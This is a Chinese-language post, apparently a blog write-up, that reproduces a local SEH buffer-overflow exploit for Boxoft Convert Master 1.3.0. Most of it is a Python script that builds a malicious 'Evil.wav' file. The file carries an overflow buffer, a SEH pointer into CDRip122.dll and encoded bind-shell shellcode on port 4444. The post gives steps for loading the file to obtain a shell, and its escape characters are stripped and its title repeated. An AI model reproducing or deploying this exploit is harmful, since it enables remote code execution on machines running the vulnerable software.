二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit

此次import struct buffer = "x41" * 4132 nseh = "xebx06x90x90" #jmp short 6 seh = struct.pack('<L',0x6d00c683) #CDRip122.dll nops = "x90" * 20 #Bind=shellcode port 4444 shellcode = ("xdaxd5xb8x9bx69x4dxa1xd9x74x24xf4x5ax33" "xc9xb1x60x83xc2x04x31x42x15x03x42x15x79" "x9cxf2x9bx0cxb0x35x05x03x97x32x91x2fx75" "x92x10x7exdfxd5xdfx95x63xd0x24x96x1exca" "xc6x57x4bxd9xe7x3cxe4x1cxa0xd9x7ex72xe4" "x38x26xd1x92x88x79x63x55xe3x94xfex9axac" "xb5xdexe4x35xbcxd0x9fxe6x92x63x51x5axaf" "xadx1bxb0xf9x6ex46xacx68xa9x48xcexb8xe1" "xd2xf5x1ax7dx84xdexb9x55xa0xe8xe3xd8xb2" "x31xfbx1ax0bxeaxedxf4x8fxddxf5x55xbfx1a" "xa5xe8xd8xfaxdex45x11x7cx4dxeax87x0fx9f" "xe5xdfx90x18x7ex52x1bxd7x24x22xabx1bxda" "x31xa2x75x8fxa3x13x99x20x5ex07x57x68x3e" "x10xc7xc2xb0x2bxa0x13xd6x6ax3exc3x1ex99" "x4fxf0xcex63x50xe3x90x80x3ex0ex9cx39x7e" "x48xe6xf0xe7x3bxd3x7dxe3xa3x62x41xeex19" "xd0xa8xc9xdbx02x93x0fx34xb0xadx81x08x57" "xcexb8x38xfex13xc9xe7x40xc2x17xa6x3ax4c" "x06x31xfcx3fx8fxcbx85x84x74x98x9cx63xe5" "x46x2fxfcx15x3bx5cx37xd3x36xfcx39x3cx86" "x29x32xbbxb3x04x13x6axd1xa7x55xacx8exa8" "x05xafxc3xaex9dxc6x5fxa8x9dx8ex4ax25x3a" "x35xa3xd7x4cxaaxb1x87xcax54x6dxdcxb2xf3" "x3axaax29xeax44x01x4exb0x08x9axd0xb5x69" "x42xe5xb4x5fx59xffxb4x90xe2x97x66x09x89" "x87x8exffxa8x21x68x3fx01xe9xb3x27x63xd2" "x93x2fx4dx9cx28x21xd4x9dxadx8fx24x19xc9" "x98xbcx24x0bx47x84x9cx57xd2x20x79x71x67" "xe0xd1xcdx40x51x7dxe2x39xa9xd2x92x4cx24" "x59x7bxfdx89x6exeaxecxc8xacx54x8ax26x60" "x81x38x06x32xabx56x1cxe7xd0x78xe5xa2x75" "xc8x28x1bxd5x3fx51") payload = buffer + nseh + seh + nops + shellcode try: f=open("Evil.wav","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

1.- Run python code :Boxoft_Convert_Master.py

2.- Open Boxoft_Convert_Master.exe

3.- Click try and Batch Convert Mode

4.- Add Evil.wav

5.- And you will have a bind shell port 4444

6.- Greetings go:XiDreamzzXi,Metatron

运行程序输出wav文件,此文件包含了shellcode,拖入转换大师中,程序崩溃,远程使用Telnet连接到windows7拿到shell。
二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit
二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit
二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit